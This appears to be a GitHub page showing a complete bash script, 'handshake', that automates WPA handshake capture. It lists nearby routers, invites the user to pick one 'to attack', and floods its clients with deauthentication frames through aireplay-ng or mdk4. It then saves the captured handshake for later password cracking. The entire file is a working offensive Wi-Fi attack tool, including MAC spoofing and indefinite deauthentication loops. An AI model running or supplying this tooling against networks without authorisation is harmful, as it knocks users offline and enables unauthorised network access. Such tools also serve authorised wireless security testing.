-
Notifications
You must be signed in to change notification settings - Fork 13
/
handshake
executable file
·512 lines (478 loc) · 18.9 KB
/
handshake
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
#!/usr/bin/env bash
# Script: handshake
# Version 1.1
# Date: 15/03/2017
# Author: mnemonic AKA semeion
# Description: Automate the handshake capturing process
# dependencies: aircrack-ng, mdk4, macchanger
# 21 dec 2018 - v 1.2 - removed wireshark-cli and cowpatty deps, cowpatty return false info about the handshake data
# 21 dec 2018 - v 1.2 - bug fix
# 06 mar 2023 - v 1.5 - verified the code using shellcheck and code fixed
# 07 mar 2023 - v 1.6 - bugs fixed
# 09 mar 2023 - v 1.7 - now the script show the vendor name for all wireless cards/adapters
shopt -s extglob
# Check dependencies
dependencies=(airodump-ng aireplay-ng airmon-ng mdk4 xterm grep tput wc cut tr awk killall)
for c in "${dependencies[@]}"; do
if ! type "$c" &>/dev/null; then
echo "${c}: command not found"
exit 1
fi
done
home=$(eval echo "~${SUDO_USER}")
[[ "$PATH" =~ $PWD ]] || export PATH=$PATH:$PWD
configdir="${home}/.config/handshake-cracker"
configfile="$configdir/scripts.conf"
if [ ! -f "$configfile" ]; then
echo "Run the 'crack' script to create the config file: $configfile"
exit 1
fi
# check if the file contains something we don't want
configfile_secured='/tmp/handshake-cracker-secured-scripts.conf'
if grep -E -q -v '^#|^[^ ]*=[^;]*' "$configfile"; then
echo "Config file is unclean, cleaning it..." >&2
# filter the original to a new file
grep -E '^#|^[^ ]*=[^;&]*' "$configfile" > "$configfile_secured"
configfile="$configfile_secured"
fi
# now source it, either the original or the filtered variant
# shellcheck source=/dev/null # to ignore the error
source "$configfile"
##################################### Some global vars
script_name="${0##*/}"
tempdir="/tmp/${script_name}" # DO NOT REMOVE OR CHANGE THIS LINE
CSVDB=dump-01.csv
white="\033[1;37m"
grey="\033[0;37m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
blue="\033[1;34m"
cyan="\033[0;36m"
transparent="\e[0m"
##################################### Usage: if confirm "Are you sure? "; then ...
confirm() { local ans IFS=; while read -rp "$1" -n1 ans; do printf '\n'; case $ans in ''|[Yy]) return 0;; [Nn]) return 1;; esac; done; };
##################################### Usage: if iface_exist wlan0; then ...
iface_exist() {
[[ -e "/sys/class/net/$1/operstate" ]]
}
##################################### Usage: if iface_up wlan0; then ...
iface_up() {
if iface_exist "$1"; then
[[ $(<"/sys/class/net/${1}/operstate") == up ]] 2>/dev/null
else
return 1
fi
}
##################################### Usage: if iface_monitor_mode wlan0; then ...
iface_monitor_mode() {
# https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/if_arp.h
if iface_exist "$1" && [ "$(cat "/sys/class/net/$1/type" 2>/dev/null)" = "803" ]; then
# 0 = true
return 0
else
# 1 = false
return 1
fi
}
##################################### Kill process used by script and restore WIFI adapter mode
function exitmode {
clear
top
echo -e "$yellow Clearing and quitting...$transparent"
echo
killall airbase-ng &>/dev/null
killall aireplay-ng &>/dev/null
killall airodump-ng &>/dev/null
killall mdk4 &>/dev/null
tput cnorm
echo -e "${white} Removing ${green}temporary files${transparent}"
rm -R "${tempdir:?}/"* &>/dev/null # https://www.shellcheck.net/wiki/SC2115
if [[ "$disable_on_exit" -eq "1" ]]; then
if iface_exist "$WIFI"; then
ip link set "$WIFI" down
if iface_monitor_mode "$WIFI"; then
echo -e "$white Disabling Monitor Mode on ${green}${WIFI}${transparent}"
iw "$WIFI" set type managed
fi
macchanger -r "$WIFI" &>/dev/null
fi
# iwconfig
# airmon-ng stop "$WIFI" &> /dev/null
fi
if [[ "$up_on_exit" -eq "1" ]]; then
ip link set "$WIFI" up
fi
echo
exit
}
trap exitmode SIGINT SIGHUP
##################################### Top
function top {
echo -en "\e[3J"
echo
echo -e "${green} ##########################################################"
echo -e "${green} # #"
echo -e "${green} # HANDSHAKE CATCHER 1.7 by mnemonic #"
echo -e "${green} # #"
echo -e "${green} ########################################################## ${transparent}"
echo
}
##################################### Muestra la info del AP seleccionado
function info_router {
local Host_MAC_MODEL
[ -e "${configdir}"/oui.txt ] && \
Host_MAC_MODEL=$(grep -Fi "${Host_MAC:0:8}" "${configdir}"/oui.txt | cut -c 11- | tr -d '\n\r')
echo -e "${yellow} SELECTED ROUTER:${transparent}"
echo
echo -e " ${cyan}ESSID${transparent} : ${Host_SSID} / ${Host_ENC}"
echo -e " ${cyan}Channel${transparent} : ${Host_CHAN}"
echo -e " ${cyan}MAC${transparent} : ${Host_MAC}"
echo -e " ${cyan}Vendor${transparent} : ${Host_MAC_MODEL}"
echo -e " ${cyan}Handshake${transparent} : ${green}${Host_CATCHED}${transparent}"
echo
echo -e " ${yellow}handshake status: ${Handshake_statuscheck}"
echo
}
##################################### Select Wifi adapter
function select_interface {
local ifaces=()
for iface in /sys/class/net/*; do
if [ -e "$iface"/wireless ]; then
ifaces+=("$(basename "$iface")")
fi
done
local nr_ifaces=${#ifaces[@]}
local choice
if [ "$nr_ifaces" -gt "0" ]; then
if [ "$nr_ifaces" -eq "1" ]; then
WIFI="${ifaces[0]}"
set_monitor_mode
else
while true; do
clear
top
echo -e "$yellow Select the Wifi adapter:"
echo
local i=0
for line in "${ifaces[@]}"; do
i=$((i+1))
echo -e "${yellow} ${i})${transparent} $line"
done
echo
echo -n " #? "
read -s -r -n 1 choice
echo "$choice"
choice=$((choice-1))
if (( choice >= 0 && choice < "${#ifaces[@]}" )); then
break
fi
done
WIFI="${ifaces[$choice]}"
set_monitor_mode
fi
else
echo -e " No Wifi adapter. Finishing..."
sleep 3
exitmode
fi
# echo "$WIFI"
# exit 0
}
function set_monitor_mode {
if iface_exist "$WIFI"; then
if iface_up "$WIFI"; then
up_on_exit="1"
fi
if ! iface_monitor_mode "$WIFI"; then
echo
echo -ne "$white Enabling Monitor Mode on ${yellow}${WIFI}${transparent}..."
ip link set "$WIFI" down && \
iw "$WIFI" set type monitor && \
disable_on_exit="1"
fi
macchanger -r "$WIFI" &>/dev/null && \
ip link set "$WIFI" up
fi
}
##################################### Selección del Canal
function select_scan_mode {
local choice
while true; do
clear
top
echo -e "${yellow} Select Scan Mode:"
echo
echo -e " ${yellow}1)${transparent} All Channels"
echo -e " ${yellow}2)${transparent} Specified Channels"
echo -e " ${yellow}3)${transparent} Quit"
echo
echo -n " #> "
read -s -r -n 1 choice
if (( choice >= 1 && choice <= 3 )); then
break
fi
done
case "$choice" in
1 ) Scan ;;
2 ) Scanchan ;;
3 ) exitmode ;;
esac
}
function msgscan {
clear
top
echo -e "${yellow} Getting list of routers available in the area...$transparent"
echo
echo -e " Hit Ctrl-C on ${yellow}SCANNING$transparent window to finish..."
echo -e " $grey(Approximately 40-60 seconds to detect all routers)$transparent"
}
##################################### Elegir canal(es) si se optó por la opción 2
function Scanchan {
if pgrep airodump-ng; then killall airodump-ng; fi
if pgrep aireplay-ng; then killall aireplay-ng; fi
if pgrep mdk4; then killall mdk4; fi
clear
top
echo -e "$yellow Select the channel(s) to scan:$transparent"
echo
echo -e " Unique channel $blue(example):${green} 6$transparent"
echo -e " Range of channels $blue(example):${green} 1-5$transparent"
echo -e " Multiple channels $blue(example):${green} 1,2,5-7,11$transparent"
echo
echo -n " #> "
read -r channel_number
set -- "${channel_number}"
msgscan
rm -rf "${tempdir:?}/"* &>/dev/null # https://www.shellcheck.net/wiki/SC2115
xterm -title "SCANNING channel(s) [$channel_number]" -geometry 95x56-0+0 -bg "#000000" -fg "#FFFFFF" -e airodump-ng --encrypt WPA -w "$tempdir"/dump --channel "$channel_number" -a "$WIFI" --ignore-negative-one
}
##################################### Escanea toda la red con airodump-ng
function Scan {
if pgrep airodump-ng; then killall airodump-ng; fi
if pgrep aireplay-ng; then killall aireplay-ng; fi
if pgrep mdk4; then killall mdk4; fi
msgscan
rm -rf "${tempdir:?}/"* &>/dev/null # https://www.shellcheck.net/wiki/SC2115
xterm -title "SCANNING" -geometry 95x56-0+0 -bg "#000000" -fg "#FFFFFF" -e airodump-ng --encrypt WPA -w "$tempdir"/dump -a "$WIFI" --ignore-negative-one
}
##################################### Elegir una red del listado
function select_router {
if pgrep airodump-ng; then killall airodump-ng; fi
if pgrep aireplay-ng; then killall aireplay-ng; fi
if pgrep mdk4; then killall mdk4; fi
clear
top
#~ local LINEAS_WIFIS_CSV=`wc -l $tempdir/$CSVDB | awk '{print $1}'`
#~ if [ "$LINEAS_WIFIS_CSV" -le 3 ]; then
#~ clear
#~ rm -rf $tempdir/*
#~ echo "select_router - LINEAS_WIFIS_CSV - && break"
#~ sleep 8
#~ exitmode
#~ fi
local wifionap
wifionap=$(< "$tempdir/$CSVDB" grep -E -a -n '(Station|Cliente)' | awk -F : '{print $1}')
wifionap=$(( wifionap - 1 ))
head -n "$wifionap" "$tempdir/$CSVDB" &> "$tempdir/dump-02.csv"
tail -n "+$wifionap" "$tempdir/$CSVDB" &> "$tempdir/clientes.csv"
echo " Nº MAC CHANNEL TYPE PWR HNDSHK ESSID"
echo
local i=0
while IFS=, read -r MAC _FTS _LTS CHANNEL _SPEED PRIVACY _CYPHER _AUTH POWER _BEACON _IV _LANIP _IDLENGTH ESSID _KEY; do
longueur=${#MAC}
if [ "$longueur" -ge 17 ]; then
i=$((i+1))
PRIVACY=$(echo "$PRIVACY" | tr -d "^ ")
PRIVACY="${PRIVACY:0:4}"
POWER=$((POWER + 100))
CLIENTE=$(< "$tempdir/clientes.csv" grep "$MAC")
# shellcheck disable=SC2154
if [ -f "${handshakes_dir}/${MAC}.cap" ]; then
CATCHED="YES"
else
CATCHED=""
fi
if [ "$CLIENTE" != "" ]; then
CLIENTE="*"
echo -e " ${red} ${i})${green}${CLIENTE}\t${red}${MAC}\t${red} ${CHANNEL}\t${green} ${PRIVACY}\t ${red}${POWER}%\t${red} ${CATCHED}\t${red}${ESSID}${transparent}"
else
echo -e " ${green} ${i})${white}${CLIENTE}\t${yellow}${MAC}\t${green} ${CHANNEL}\t${blue} ${PRIVACY}\t ${yellow}${POWER}%\t${green} ${CATCHED}\t${green}${ESSID}${transparent}"
fi
achannel["$i"]="$CHANNEL"
amac["$i"]="$MAC"
aprivacy["$i"]="$PRIVACY"
# aspeed["$i"]="$SPEED"
ahost_catched["$i"]="$CATCHED"
#~ ahost_ssid["$i"]=${ESSID}
ahost_ssid["$i"]=${ESSID# } ### remove leading whitespace
ahost_ssid["$i"]=${ahost_ssid[$i]#\"} ### remove leading "
ahost_ssid["$i"]=${ahost_ssid[$i]%\"} ### remove trailing "
fi
done < "$tempdir/dump-02.csv"
echo
echo -e " ${red}(${green}*${red})${white} In red: networks with potential active clients${transparent}"
echo
echo -e "${yellow} Select a number to attack ${transparent}(${yellow}r${grey}escan/${yellow}q${transparent}uit):"
echo
echo -n " #> "
read -r choice
case "$choice" in
+([0-9]))
if (( choice > 0 && choice <= i )); then
if exist_handshake "${amac[$choice]}"; then
#~ Handshake_statuscheck="${green}Good handshake!${transparent}"
if confirm " A good handshake already exist! Select another target? (Y/n): "; then
select_router
else
if confirm " Confirm delete this handshake? (Y/n): "; then
rm -f "${handshakes_dir:?}/${amac[$choice]:?}.cap"
ahost_catched["$choice"]=""
Handshake_statuscheck="${red}None or Invalid handshake.${transparent}"
else
select_router
fi
fi
else
Handshake_statuscheck="${red}None or Invalid handshake.${transparent}"
fi
else
select_router
fi
;;
r) select_scan_mode
select_router;;
q) exitmode;;
*) select_router;;
esac
# Host_SPEED="${aspeed[$choice]}"
Host_ENC="${aprivacy[$choice]}"
Host_MAC="${amac[$choice]}"
Host_CHAN=$(echo "${achannel[$choice]}" | tr -d '[:space:]')
Host_SSID="${ahost_ssid[$choice]}"
Host_CATCHED="${ahost_catched[$choice]}"
}
# input: BSSID
# return: boolean
function exist_handshake {
local handshakefile output bssid
handshakefile="${handshakes_dir}/${1}.cap"
if [ -f "$handshakefile" ]; then
output=$(aircrack-ng "${handshakefile}" 2>&1)
bssid=$(echo "${output}" | grep -P "([A-F0-9]{2}:){5}[A-F0-9]{2}" | grep -e "WPA ([0-9] handshake" | awk -F ' ' '{print $2}')
if [[ "$bssid" == *"$1"* ]] && check_hs "$1" "${handshakefile}" && aircrack-ng "${handshakefile}" | grep -P "([A-F0-9]{2}:){5}[A-F0-9]{2}" | grep -qoe "WPA ([1-9] handshake.*)$"; then
return 0
else
return 1
fi
else
return 1
fi
}
function deauth_all {
if pgrep aireplay-ng; then
killall aireplay-ng
fi
xterm -title "Deauth all clients in $Host_SSID" -geometry 80x20-0-30 -bg "#000000" -fg "#FF0009" -e aireplay-ng --deauth 9999999999999 -a "$Host_MAC" --ignore-negative-one "$WIFI" &> /dev/null &
}
function deauth_mdk4 {
if pgrep mdk4; then
killall mdk4
fi
echo "$Host_MAC" >"$tempdir"/mdk4.txt
xterm -title "Deauth all clients in $Host_SSID" -geometry 80x20-0-30 -bg "#000000" -fg "#FF0009" -e mdk4 "$WIFI" d -b "$tempdir"/mdk4.txt -c "$Host_CHAN" &> /dev/null &
#~ mdk4PID=$!
}
# Deauth to specific targets
function deauth_quickly {
targets=$(< "${tempdir}/${Host_MAC}-01.csv" grep -a "$Host_MAC" | awk '{ print $1 }'| grep -a -v 00:00:00:00| grep -v "$Host_MAC")
if pgrep aireplay-ng; then
killall aireplay-ng
fi
for target in $targets; do
target_MAC=${target:0:17}
# shellcheck disable=SC2154
xterm -title "Deauthenticating $target_MAC..." -geometry 80x20-0-30 -bg "#000000" -fg "#FF0009" -e aireplay-ng -0 "$deauth_time" -a "$Host_MAC" -c "$target_MAC" --ignore-negative-one "$WIFI" &> /dev/null
done
}
##################################### Capturando Handshake
function capture_handshake {
if pgrep airodump-ng; then
killall airodump-ng
fi
rm -rf "${tempdir:?}/$Host_MAC"* &>/dev/null # https://www.shellcheck.net/wiki/SC2115
Handshake_statuscheck="${cyan}Capturing handshake...${transparent}"
xterm -title "Capturing Handshake $Host_SSID" -geometry 95x20-0+0 -bg "#000000" -fg "#FFFFFF" -e airodump-ng --ignore-negative-one --bssid "$Host_MAC" -w "$tempdir"/"$Host_MAC" --channel "$Host_CHAN" -a "$WIFI" &>/dev/null &
}
##################################### Verifica handshake - INPUT: bssid file.cap
check_hs() {
local output
output=$(aircrack-ng -b "$1" "$2" 2>&1)
if echo "${output}" | grep -qFoi "potential target" && ! echo "${output}" | grep -qFoi "No matching network"; then
return 0
else
return 1
fi
}
##################################### Comprueba el handshake antes de continuar
function check_handshake {
local output bssid
if mv -f "${tempdir}/${Host_MAC}-01.cap" "${tempdir}/test.cap" &>/dev/null; then
output=$(aircrack-ng "${tempdir}/test.cap" 2>&1)
bssid=$(echo "${output}" | grep -P "([A-F0-9]{2}:){5}[A-F0-9]{2}" | grep -e "WPA ([0-9] handshake" | awk -F ' ' '{print $2}')
fi
if [[ "$bssid" == *"$Host_MAC"* ]] && check_hs "$Host_MAC" "${tempdir}/test.cap" && aircrack-ng "${tempdir}/test.cap" | grep -P "([A-F0-9]{2}:){5}[A-F0-9]{2}" | grep -qoe "WPA ([1-9] handshake.*)$"; then
# Save handshake
mv -f "${tempdir}/test.cap" "${handshakes_dir}/$Host_MAC.cap" &>/dev/null
Host_CATCHED="YES"
Handshake_statuscheck="${green}Good handshake!${transparent}"
rm -f "${tempdir:?}/test.cap" &>/dev/null
if pgrep airodump-ng; then
killall airodump-ng
fi
else
Handshake_statuscheck="${red}None or Invalid handshake.${transparent}"
rm -f "${tempdir:?}/test.cap" &>/dev/null
capture_handshake
fi
}
##################################### Run as Root
if [[ $EUID -ne 0 ]]; then
echo -e "use: sudo ${script_name}"
exit 1
fi
##################################### Create dirs and files
if [ ! -d "$tempdir" ]; then mkdir -p "$tempdir" &>/dev/null; fi
if [ ! -d "$handshakes_dir" ]; then mkdir -p "$handshakes_dir" &>/dev/null; fi
##################################### Capture menu
clear
top
select_interface
select_scan_mode
select_router
while true; do
clear
top
info_router
echo -e " ${yellow}1)${transparent} Catch/Check/Save captured handshake"
echo -e " ${yellow}2)${transparent} Restart handshake capture"
echo -e " ${yellow}3)${transparent} Deauth each client quickly"
echo -e " ${yellow}4)${transparent} Deauth all using aireplay-ng"
echo -e " ${yellow}5)${transparent} Deauth all using mdk4"
echo -e " ${yellow}6)${transparent} Select another router"
echo -e " ${yellow}7)${transparent} Quit"
echo
echo -n " #> "
read -s -r -n 1 choice
case $choice in
1 ) check_handshake;;
2 ) capture_handshake;;
3 ) deauth_quickly;;
4 ) deauth_all;;
5 ) deauth_mdk4;;
6 ) rm -rf "${tempdir:?}/$Host_MAC"* &>/dev/null # https://www.shellcheck.net/wiki/SC2115
Handshake_statuscheck="${red}None or Invalid handshake.${transparent}"
select_router;;
7|q) exitmode;;
esac
done